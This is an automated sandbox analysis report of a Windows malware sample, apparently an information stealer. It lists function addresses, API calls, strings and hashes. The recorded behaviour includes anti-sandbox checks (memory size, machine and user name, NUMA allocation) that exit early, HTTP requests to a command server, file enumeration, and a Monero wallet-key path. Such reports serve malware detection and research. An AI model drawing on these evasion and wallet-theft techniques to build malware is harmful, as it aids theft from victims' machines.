                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                            • String ID:
                            • API String ID: 2525456742-0
                            • Opcode ID: 45ed4b06d99a617b7b83e3421213b0d9395812c9f85d6f73082c9fc652649ca1
                            • Instruction ID: fb08d099a272fc85193b19a40129ac7c8c600d824d8a92146aee17965a2e63c1
                            • Opcode Fuzzy Hash: 45ed4b06d99a617b7b83e3421213b0d9395812c9f85d6f73082c9fc652649ca1
                            • Instruction Fuzzy Hash: 6A313070904608AADB06F7F0DC57FEE7778AF14342F404619F902AA1A1EF70694DE7A2
                            Function 00341220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1436 341220-341247 call 3589b0 GlobalMemoryStatusEx 1439 341273-34127a 1436->1439 1440 341249-341271 call 35da00 * 2 1436->1440 1442 341281-341285 1439->1442 1440->1442 1444 341287 1442->1444 1445 34129a-34129d 1442->1445 1447 341292-341294 ExitProcess 1444->1447 1448 341289-341290 1444->1448 1448->1445 1448->1447
                            APIs
                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0034123E
                            • __aulldiv.LIBCMT ref: 00341258
                            • __aulldiv.LIBCMT ref: 00341266
                            • ExitProcess.KERNEL32 ref: 00341294
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 3404098578-2766056989
                            • Opcode ID: eb4062b739788f81ea8bb6a95ee7aa3cb2f2a0cdba3446504afcdd145f4a79e9
                            • Instruction ID: 89616c3a714f514f83bb070e44c8263ae8ea1c813480a7f38f523c4c8cb58eed
                            • Opcode Fuzzy Hash: eb4062b739788f81ea8bb6a95ee7aa3cb2f2a0cdba3446504afcdd145f4a79e9
                            • Instruction Fuzzy Hash: 840162B0D54308BAEB10DBD4DC49B9EB7B8AB14701F208445FB05FA1C0D7B465858B59
                            Function 00356AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1450 356af3 1451 356b0a 1450->1451 1453 356b0c-356b22 call 356920 call 355b10 CloseHandle ExitProcess 1451->1453 1454 356aba-356ad7 call 35aad0 OpenEventA 1451->1454 1460 356af5-356b04 CloseHandle Sleep 1454->1460 1461 356ad9-356af1 call 35aad0 CreateEventA 1454->1461 1460->1451 1461->1453
                            APIs
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00FB9A18,?,0036110C,?,00000000,?,00361110,?,00000000,00360AEF), ref: 00356ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00356AE8
                            • CloseHandle.KERNEL32(00000000), ref: 00356AF9
                            • Sleep.KERNEL32(00001770), ref: 00356B04
                            • CloseHandle.KERNEL32(?,00000000,?,00FB9A18,?,0036110C,?,00000000,?,00361110,?,00000000,00360AEF), ref: 00356B1A
                            • ExitProcess.KERNEL32 ref: 00356B22
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                            • String ID:
                            • API String ID: 941982115-0
                            • Opcode ID: ab91cdc0da7125066772b957a35eda6debbdb9cd11996f96f7f3cf7c087761aa
                            • Instruction ID: 7ca6c2cff937c667f464f8121d166fbb90cf78de86f2f577988831ca61fb0437
                            • Opcode Fuzzy Hash: ab91cdc0da7125066772b957a35eda6debbdb9cd11996f96f7f3cf7c087761aa
                            • Instruction Fuzzy Hash: 31F05E70944209ABF702ABA0DC0BFBD7B78EB14702F904515BD03F61E1DBB05548EB66
                            Function 003447B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00344839
                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00344849
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1274457161-4251816714
                            • Opcode ID: bffaeb948e0216c56d61e84d6dcca346d5bf8e961cb428d2df80200bdff6d989
                            • Instruction ID: 537ace44f4bd1676352b0421dc7cbf0fbc418c119856fe83136c368f856cae22
                            • Opcode Fuzzy Hash: bffaeb948e0216c56d61e84d6dcca346d5bf8e961cb428d2df80200bdff6d989
                            • Instruction Fuzzy Hash: A3214FB1D00209ABDF14DFA4E845ADE7B74FB44320F108625F915AB2D1EB706A09DF91
                            Function 003551F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                              • Part of subcall function 00346280: InternetOpenA.WININET(00360DFE,00000001,00000000,00000000,00000000), ref: 003462E1
                              • Part of subcall function 00346280: StrCmpCA.SHLWAPI(?,00FBE858), ref: 00346303
                              • Part of subcall function 00346280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00346335
                              • Part of subcall function 00346280: HttpOpenRequestA.WININET(00000000,GET,?,00FBE2E0,00000000,00000000,00400100,00000000), ref: 00346385
                              • Part of subcall function 00346280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003463BF
                              • Part of subcall function 00346280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003463D1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00355228
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                            • String ID: ERROR$ERROR
                            • API String ID: 3287882509-2579291623
                            • Opcode ID: 70e2e2e115e026cc112e5be7ae40d7f2528e2b885bc3f20561849b52b5031f70
                            • Instruction ID: 25dc88a6e1770f70b723a7171814f03509e4affc678b48b4256841f97a937995
                            • Opcode Fuzzy Hash: 70e2e2e115e026cc112e5be7ae40d7f2528e2b885bc3f20561849b52b5031f70
                            • Instruction Fuzzy Hash: 82111F30900508A6CB15FF60DD52EED7778AF50301F408654FC1A5E5A2EF306B09E791
                            Function 003578E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357910
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00357917
                            • GetComputerNameA.KERNEL32(?,00000104), ref: 0035792F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: b8b80d4a059a0a86856823d9a5b13344d9debc4e8fdbbf477868ac902d30917d
                            • Instruction ID: 8fe26494bcd6fe7142d658902e07557b935ebeaa651a54b75a60f0d97ba0d8c8
                            • Opcode Fuzzy Hash: b8b80d4a059a0a86856823d9a5b13344d9debc4e8fdbbf477868ac902d30917d
                            • Instruction Fuzzy Hash: AF016DB1A04208EBD710DF98DD45FAAFBB8FB04B22F10421AEE45A2690C37459088BA1
                            Function 00341110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0034112B
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00341132
                            • ExitProcess.KERNEL32 ref: 00341143
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$AllocCurrentExitNumaVirtual
                            • String ID:
                            • API String ID: 1103761159-0
                            • Opcode ID: 2c5592431f8916741811e0bcb736b516c365f7eacc7d103008f228f3c6f1bcd8
                            • Instruction ID: a8f467ad42c93c1126d2746b8ed9821c7bd4229069f2be097e4aaaf657b2c99d
                            • Opcode Fuzzy Hash: 2c5592431f8916741811e0bcb736b516c365f7eacc7d103008f228f3c6f1bcd8
                            • Instruction Fuzzy Hash: 96E0E670A45348FBF710ABA09C0AB1976B8EB14B41F105055FB09BA1D0D6B53645AB9A
                            Function 003410A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 003410B3
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 003410F7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: 66769a9fd8544d901a5484ec3fffafb11aaea8f856139ba2661dc1d3f54a3681
                            • Instruction ID: 38812c7dca60289d99d36021b221bd454364c06f323ab752fa2003c314e82581
                            • Opcode Fuzzy Hash: 66769a9fd8544d901a5484ec3fffafb11aaea8f856139ba2661dc1d3f54a3681
                            • Instruction Fuzzy Hash: F2F0E271641208BBE7149BA4AC49FAAB7E8E705B15F301448F904E7280E571AE44DBA0
                            Function 00341190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357910
                              • Part of subcall function 003578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00357917
                              • Part of subcall function 003578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0035792F
                              • Part of subcall function 00357850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003411B7), ref: 00357880
                              • Part of subcall function 00357850: RtlAllocateHeap.NTDLL(00000000), ref: 00357887
                              • Part of subcall function 00357850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0035789F
                            • ExitProcess.KERNEL32 ref: 003411C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AllocateName$ComputerExitUser
                            • String ID:
                            • API String ID: 3550813701-0
                            • Opcode ID: 9ff5723d009bd4b120970f87786c61783b28a4049763ebc4665950e9c9fc28b1
                            • Instruction ID: 9ea1172836815cee43c54cda6eb28ffdd35e4a04b16087319b7c52c3344b57fc
                            • Opcode Fuzzy Hash: 9ff5723d009bd4b120970f87786c61783b28a4049763ebc4665950e9c9fc28b1
                            • Instruction Fuzzy Hash: 00E012B591430153DE0173B1BC0BF2A339C5B24347F041425FE05EB122FE29F848966A

                            Non-executed Functions

                            Function 003538B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 003538CC
                            • FindFirstFileA.KERNEL32(?,?), ref: 003538E3
                            • lstrcat.KERNEL32(?,?), ref: 00353935
                            • StrCmpCA.SHLWAPI(?,00360F70), ref: 00353947
                            • StrCmpCA.SHLWAPI(?,00360F74), ref: 0035395D
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00353C67
                            • FindClose.KERNEL32(000000FF), ref: 00353C7C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 1125553467-2524465048
                            • Opcode ID: 77e00680e05eca6e031995495eef61478d900654f2992611177dfbb6f864b1e3
                            • Instruction ID: f43075923ab2b77ac0b2d09da63d2e5abf835a8cd914e7b49dec2c3905464327
                            • Opcode Fuzzy Hash: 77e00680e05eca6e031995495eef61478d900654f2992611177dfbb6f864b1e3
                            • Instruction Fuzzy Hash: 89A152B1A002089BDB25DF64DC85FEE7378FB58301F044589F90DAA155EB75AB88CF62
                            Function 0034BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                            • FindFirstFileA.KERNEL32(00000000,?,00360B32,00360B2B,00000000,?,?,?,003613F4,00360B2A), ref: 0034BEF5
                            • StrCmpCA.SHLWAPI(?,003613F8), ref: 0034BF4D
